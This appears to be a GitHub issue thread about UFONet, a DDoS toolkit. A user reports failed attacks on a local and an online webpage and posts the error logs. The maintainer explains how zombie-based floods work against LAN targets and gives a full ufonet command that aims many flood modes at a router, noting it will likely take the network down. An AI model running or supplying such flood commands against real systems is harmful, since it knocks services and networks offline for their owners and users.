### ISSUE TITLE
Attack a local webpage

### ISSUE THREAD

**Issue by ShadowWoIf** [epsylon/ufonet#157]
Is it possible to host a webpage in the a PC in the network which is accessible by other computers in the network and attack that webpage/computer using the ufonet?

I tried that and another website hosted on the internet but both the cases the following error showed up:

[Info] [Zombies] Attacking from: addons.silverstripe.org
[Info] [Zombies] http://addons.silverstripe.org/add-ons/cyberduck/referer-tracker&amp;sa=U&amp;ved=0ahUKEwjgsdqZj7nKAhVF62MKHb9SC84QFgjfAjA5&amp;usg=AFQjCNF3xlQvi_jXAoilaWv3vj88Zua5ewreferer= -> FAILED (cannot connect!)

[Error] [AI] Something wrong attacking!

[Info] [Zombies] http://omahkain.com/search/AngularJS+and+Google+OAuth2+redirect_uri+++Stack+Overflow/&amp;sa=U&amp;ved=0ahUKEwjk7uuWj7nKAhUBWmMKHQUgB4gQFgjvAzBZ&amp;usg=AFQjCNFm4wl8QKlRRvvJnCVZL2pCcHEuRwredirect_uri= -> FAILED (cannot connect!)
Segmentation fault

Seems like the attacks are not working and I do not know why. It should have worked at least on the online webpage. I can provide you the website link if you need.

Thank You

**Comment by ShadowWoIf** [comment]
The following command to check the zombies don't seem to work as well

./ufonet -t botnet/zombies.txt which results

Are 'they' alive? :-) (HEAD Check):
Trying: 742
[Error] [AI] Something wrong testing!

**Comment by epsylon** [comment]
Hi

> Is it possible to host a webpage in the a PC in the network which is accessible by other computers in the network and attack that webpage/computer using the ufonet?

Yes, it is possible, but knowing several circumstances. First, understanding how DDoS attacks work in UFONet, we can discard zombies that do not reach the connection from the outside (for reasons of NAT). However, if the victim serves some kind of content in port 80,443 (in others, some changes could also be made), any attack related to layer 3 will be effective.

**Comment by epsylon** [comment]
For example, let's suppose that we can not access from outside and we want to carry out an attack (DDoS and DoS) against a machine on LAN (a router, for example):
./ufonet -a "http://192.168.1.1" -b "/router-servlet/config.html" -r 100 --no-head --no-aliens --no-droids --no-rpcs --no-ucavs --spray 100 --smurf 100 --tachyon 1000 --loic 100 --loris 100 --ufosyn 1000 --xmas 100 --nuke 1000 -v
Depending on the configuration, it is likely that the entire network runs out of router operation ...
